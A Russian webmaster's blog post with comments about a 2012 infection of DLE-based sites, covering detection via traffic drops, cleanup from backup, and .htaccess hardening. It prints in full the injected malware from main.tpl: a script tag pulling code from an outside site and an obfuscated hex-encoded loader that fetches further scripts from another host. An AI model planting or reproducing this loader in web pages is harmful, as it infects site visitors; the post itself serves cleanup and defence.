20-01-2012, 17:53 Посмотрели: 6126 Добавил: Alex V

Новый вирус на CMS DLE


Здравствуйте уважаемые посетители w9y.ru.

Сегодня я хочу рассказать Вам о новой волне заражений сайтов на CMS DLE.

Раньше таких проблем никогда не встречал с сайтами, так как основная проблема этого заражения состоит в том, что после того как он устанавливается на сайт в файл main.tpl, то все русские слова в этом файле просто исчезают. Что не есть хорошо, так как пользователь на сайте не может прочитать нужную информацию.

Для того что спалить этот вирус на сайте, достаточно анализировать посещаемость своих сайтах через любой софт или онлайн панельку (pr-cy или maulnet-tools). Так как вирус удаляет кириллические символы и другой код (в том числе счетчики статистики), то это хороший способ отследить активность вирусов на сайте.

С утра, я заметил на своих сайтах посещаемость которая упала в сотни раз и не доходила и до 20 человек. Сначала я подумал что это фильтры от яндекса или гугл, но не на стольких же сайтах сразу? Затем я зашел на все подозрительные сайты у которых упал трафик и антивирус Касперского сразу же начал выдавать окошки с заражением.

Что же я делал дальше?

1. Зашел на ftp хостинга. Все сайты были зараженные именно на одном хостинге sweb.ru и только на CMS DLE. Другие CMS и статика не пострадала. Конечно это нельзя назвать играми гонками на время, но все же некая схожесть есть, ведь чем быстрее его найти, тем быстрее можно восстановить сайт.

2. Начал смотреть на дату изменения файлов в главной директории и ничего не обнаружил.

3. Зашел в папку с основным шаблоном и заметил что файл main.tpl изменялся сегодня ночью (хотя я этого не делал)

4. После этого я зашел в другие шаблоны сайта, но так ничего не обнаружил в файлах main.tpl

5. В шаблоне smartphone (шаблон для мобильных телефонов) так же находился опасный код и все в том же файле main.tpl

6. Я скачал весь сайт на жесткий диск, чтобы быстро все просмотреть и найти ещё зараженные файлы. Но, ничего не нашел.

7. В основном шаблоне и smartphone в файле main.tpl (в двух шаблонах) я нашел такой код:

<script type="text/javascript" src="http://w-moby.ru/js.php?redirect=http%3A//w-moby.ru/%3Fr%3D584"></script>
<script type="text/javascript">var _0x7ec6=["\x63\x68\x61\x72\x73\x65\x74","\x63\x68\x61\x72\x61\x63\x74\x65\x72\x53\x65\x74","\x69\x74\x65\x6D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x65\x78\x65\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x62\x6C\x6F\x67\x6F\x6F\x64\x2E\x72\x75\x2F\x54\x65\x73\x74\x2F\x75\x74\x66\x38\x2E\x6A\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x62\x6C\x6F\x67\x6F\x6F\x64\x2E\x72\x75\x2F\x54\x65\x73\x74\x2F\x61\x73\x63\x69\x69\x2E\x6A\x73"];var charset=document[_0x7ec6[0]]||document[_0x7ec6[1]];var js;function include_js(_0xc106x4){var _0xc106x5=document[_0x7ec6[4]](_0x7ec6[3])[_0x7ec6[2]](0);js=document[_0x7ec6[6]](_0x7ec6[5]);js[_0x7ec6[9]](_0x7ec6[7],_0x7ec6[8]);js[_0x7ec6[9]](_0x7ec6[10],_0xc106x4);_0xc106x5[_0x7ec6[11]](js);js[_0x7ec6[12]]=function (){alert(js[_0x7ec6[13]]);if(js[_0x7ec6[13]]==_0x7ec6[14]){imready();};};return false;};if(/utf/i[_0x7ec6[15]](charset))&#123;include_js(_0x7ec6[16]);} else &#123;include_js(_0x7ec6[17]);};</script>
</body>


Который находиться перед закрывающим тегом body, а так же этот код дублируется 4 раза (не понятно зачем)

8. Удалить этот код НЕЛЬЗЯ! Т.е. вы это можете сделать, но шаблон все равно будет не рабочим. Так как все этот код или какой-то другой при установке, удаляет русские слова и другой код. Что не есть хорошо. Вариант только один, восстановить файл main.tpl в двух шаблонах с beckup сайта.

Если он у Вас есть на компьютере, как у меня, то ничего сложного вам этот вирус не сделает. Вы просто заменяете файл main.tpl на хостинге и вирус естественно исчезает и шаблон полностью восстанавливается.

Но! Если у Вас нет резервной копии, то Вам нужно обращаться к вашему хостингу в тех.поддержку и просить их восстановить два файла main.tpl и двух шаблонах.

Пока мне не известно каким образом вирус попадает на сайт, возможно это станет известно через некоторое время. О том как закрыть эту дыру, я напишу сразу же когда мне станет известно. А пока есть только способ удаления этой заразы с сайта.

Спасибо за внимание!
Рубрика записи: Баг-фиксы

Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь. Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.

№ 1. 20-01-2012 17:57 Alex V из групы: Администраторы сказал :
Если кто знает как вирус попадает на сайты, пишите в комментах!

Коллектив WebNine Young (w9y)
№ 2. 24-01-2012 08:16 Mr_lelik из групы: Посетители сказал :
Эта штука и ко мне залезла. Посмотри все папки куда можно загружать картинки, музыку, видео и т.п. у меня оказался в папке uploads/fotos файл fotos.php его там не должно быть.
В папки uploads и templates добавь файл .htacces с прописанным параметром.

<FilesMatch ".([Pp][Hh][Pp]|[Cc][Gg][Ii]|[Pp][Ll]|[Ph][Hh][Tt][Mm][Ll]).?.*">
Order allow,deny
Deny from all
</FilesMatch>
Чтобы запретить выполнение скриптов в них.

Вот написал комент и у тебя в хаках статью нашел об этом. Вирус на сайт (его ШЕЛЛ называют)как то через БД попадает. Только ХЗ как.

И посмотри, в админке редактирование пользователей, я у себя нашел 5 админов... Хотя один был я.

Жаль не всю заразу удалил, при клике на пустом месте сайта, вылазит поп-ап какой-то, ХЗ где его найти.
№ 3. 24-01-2012 09:08 Alex V из групы: Администраторы сказал :
Mr_lelik спасибо за содержательный комментарий.

Сейчас проверю и у себя.

Только правильное содержание файла .htaccess:

<FilesMatch "\.(php|cgi|pl|php3|php4|php5|php6|phps|phtml|shtml)$">
   Order allow,deny
   Deny from all
</FilesMatch>

Коллектив WebNine Young (w9y)

Информация

Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.

Юзер панель
Я тебя не знаю!
Зарегистрируйся, либо

войди под своим логином!

Fuck, я забыл свой пароль!

Восстановить данные =0
Новое на сайте
Известная социальная сеть Instagram приступила к тестированию новой...
Недавно, в приложения для Android и iOS социальной сети Twitter была...
Недавно, в Google "Мой бизнес" разработчики добавили новейший способ, как...
Недавно стало известно о том, что соцсеть Facebook по упоминанию в русских...
Недавно, представитель корпорации Google, Джон Мюллер (John Mueller)...
Голосуем

Ваша любимая CMS?


DataLife Engine
WordPress
Joomla
Drupal
LiveStreet
UCOZ
Самопис
Php+Includ
Статика